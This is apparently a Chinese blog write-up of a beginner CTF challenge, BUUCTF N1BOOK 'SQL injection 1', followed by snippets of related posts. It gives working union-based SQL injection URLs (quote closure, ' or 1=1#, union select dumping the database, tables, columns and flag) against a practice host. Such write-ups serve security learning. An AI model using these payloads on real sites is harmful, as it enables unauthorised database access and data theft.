BuuCTF之N1BOOK~SQL注入1

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量499 收藏 2
点赞数
分类专栏: CTF 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yinger699/article/details/120511715
版权

hello~大家好!我是’今天不吃糖, 一只纯纯的小白,正在学习CTF,写文章目的是为了多积累一下解题思路

在这里插入图片描述

1.通过判断id=1,2,3,4发现,只有当id=4时没有回显,初次判定字段数为3.
在这里插入图片描述
2.判断闭合方式
(1)在id=1后加一个单引号
在这里插入图片描述发现没有回显,证明不是使用单引号闭合的
(2)在单引号后添加#
发现也没有回显,大佬说,这是编码的问题,将’#进行URL编码
在这里插入图片描述果然,正常回显了,达到闭合效果。

3.判断是否过滤了and和or
(1)输入万能钥匙
’ or 1=1#
在这里插入图片描述在这里插入图片描述证明or没被过滤

在这里插入图片描述在这里插入图片描述and也没有被过滤

在这里插入图片描述在这里插入图片描述验证了字段只有三列
4.找回显点

http://db3aa7d8-34be-4baf-938d-cf64b0b57dd8.node4.buuoj.cn:81/index.php?id=-1%27%20union%20select%201,2,3%23
在这里插入图片描述显位点,使用堆叠注入(union)
爆库!
http://db3aa7d8-34be-4baf-938d-cf64b0b57dd8.node4.buuoj.cn:81/index.php?id=-1%27%20union%20select%201,database(),3%23在这里插入图片描述爆表!
http://db3aa7d8-34be-4baf-938d-cf64b0b57dd8.node4.buuoj.cn:81/index.php?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27note%27%23
在这里插入图片描述
爆字段名

http://db3aa7d8-34be-4baf-938d-cf64b0b57dd8.node4.buuoj.cn:81/index.php?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27fl4g%27%23
在这里插入图片描述获取到字段名,接下来就是爆数据
http://db3aa7d8-34be-4baf-938d-cf64b0b57dd8.node4.buuoj.cn:81/index.php?id=-1%27%20union%20select%201,2,fllllag%20from%20fl4g%23
在这里插入图片描述最后~
n1book{union_select_is_so_cool}

nice~开心q(≧▽≦q)
好啦,最后,我们在总结一下此题思路:1.确定闭合方式2.判断是否过滤了关键字3.确定字段名有几列4.找回显点5.开始爆库,爆表,最后获取表中数据。

具体的解题过程,请查看
https://blog.csdn.net/m_de_g/article/details/117675569

'今天不吃糖~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF刷题记录之Buuctf-N1BOOK——sql注入1
m_de_g的博客
06-07 1253
Buuctf刷题————N1BOOK——sql注入1 一、思路 1.URL后面的id=1,2,3;会出现不同的界面,但是,但我们输入4时,发现没有回显 2.推测有有三列,还是老方法, http://4d366f97-7645-4633-a532-1b86e5b44f90.node3.buuoj.cn/index.php?id=1’ 没有回显,当我们使用#注释’的时候,发现没有回显 http://4d366f97-7645-4633-a532-1b86e5b44f90.node3.buuoj.cn/in
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2
weixin_40872714的博客
03-28 892
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2 查看html代码,看到有一个提示,说明是要我们报错注入 先抓包,加了tips=1后就会有报错的信息 首先报数据库 note 尝试报表名,出错了,根据错误信息,可能是前面的select被过滤了,这里就是不断尝试,没有什么好的方法 使用双写绕过 获得了关键的fl4g表,flag应该就在这里面 尝试报字段名得到flag字段 直接得到flag ...
BUUCTF关于sql注入的题目
最新发布
2302_80935968的博客
04-19 761
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
CTFer成长之路之CTF中的SQL注入
自强不息
02-20 1483
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
《从0到1:CTFer成长之路》书籍配套题目[第一章 web入门]SQL注入
wuyaowangchuan的博客
11-19 2011
这道题没有过滤,超级简单 文章目录手注sqlmap跑 进入环境 手注 b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1' http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23 id=1%27%20and%201=2%20%23 说明是字符型注入 然后开始注入 ?id=1%27.
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4647
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
小牛N1全车电路图小牛N1S
10-04
小牛N1全车电路图
小牛N1线束定义接线图电路图
10-31
小牛N1线束定义接线图电路图
小牛N1s电路图(A3打印)
05-19
《小牛N1s电路图解析与探讨》 在当今智能电动车领域,小牛N1s凭借其出色的性能和设计理念赢得了众多消费者的喜爱。对于爱好DIY或者希望深入了解电动车内部构造的用户来说,小牛N1s的电路图无疑是至关重要的参考资料...
S905D-N1刷机工具包
07-27
标题中的"S905D-N1刷机工具包"指的是针对特定型号设备——可能是智能手机或者平板电脑——S905D-N1的刷机工具集合。这个刷机工具包是为那些想要更新或恢复其设备操作系统,或者解决系统问题的用户准备的。刷机通常...
N1盒子救砖工具.zip
10-18
然而,像所有电子设备一样,N1盒子可能会遇到系统崩溃或无法启动的问题,我们通常称之为“砖了”。在这种情况下,"N1盒子救砖工具.zip" 提供了解决方案。这个压缩包包含了一系列必要的文件和教程,帮助用户恢复N1...
BUUCTF[Web 1](SQL注入1)
夜思红尘的博客
06-22 315
这里是关于网络安全之SQL注入的练习,这里SQL是一个十分危险的漏洞,因此我们要注重有关于SQL注入的防御,同时欢迎大家前来阅读!
BUUCTF SQL注入-1
2303_79340715的博客
01-27 791
最近学了一手SQL注入,就找了个题目练练手写的比较长,我觉得认真看完挺有用的SQL注入就是一步一步来的,当然SQLMAP应该是能直接出来的,但是我觉得新手和我一样的还是可以试试手工注入的,更有成就感哈哈哈哈。
N1BOOK第三关摸鱼:[第一章 web入门]SQL注入-1
weixin_45571987的博客
11-30 3187
BUUCTF:[第一章 web入门]SQL注入-1寻找注入点尝试注入测试有几个回显开始查库查表查字段flag 寻找注入点   由域名和题目的名字可以知道咱们这道题需要尝试对它进行SQL注入http://554314db-43b4-4f9d-b9bb-b6089db353a1.node3.buuoj.cn/index.php?id=1 ?id=1’ and 1=2 页面出现错误,说明存在注入点 id 尝试注入 测试有几个回显 ?id=1’ order by3 --+ 页面正常 ?id=1’ order
BUUCTF-wp-[第一章 web入门]SQL注入-1
Accompany的博客
11-28 1237
文章目录开始进行注入get基于报错的注入,首先通过order by判断字段名利用union select 联合查询,查询字段确定好位置后,利用union select 联合查询,获取数据库名得到数据库名后进行爆表,得到表名得到表名后进行爆列爆列完成后查看记录 又是一个小小的分享,display() 进入页面后使用最经典的单引号判断法返回与id=1时不同的错误信息,便可以得知此题存在sql注入 然后通过如下操作可判断其是个字符型注入 此处的判断对于此题有点冗余,两种注入的差别并不大 id=1%27%20a
BUUCTF web SQL注入
m0_55854679的博客
08-09 2778
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
N1BOOK[第一章 web入门]SQL注入
cfy2401926342的博客
02-09 268
tips=1 开启mysql错误提示。
BUUCTF N1BOOK [第一章 web入门]SQL注入-1
hivjianxian的博客
11-22 658
ctf题解
常见的一些SQL注入漏洞类型
Loser5的博客
03-14 6021
刚接触SQL注入不久,整理了一些常见的漏洞类型和相关漏洞的演示过程。
buuctf n1book
08-23
- *1* *2* *3* [BUUCTF笔记之N1BOOK](https://blog.csdn.net/shuaicenglou3032/article/details/117934550)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值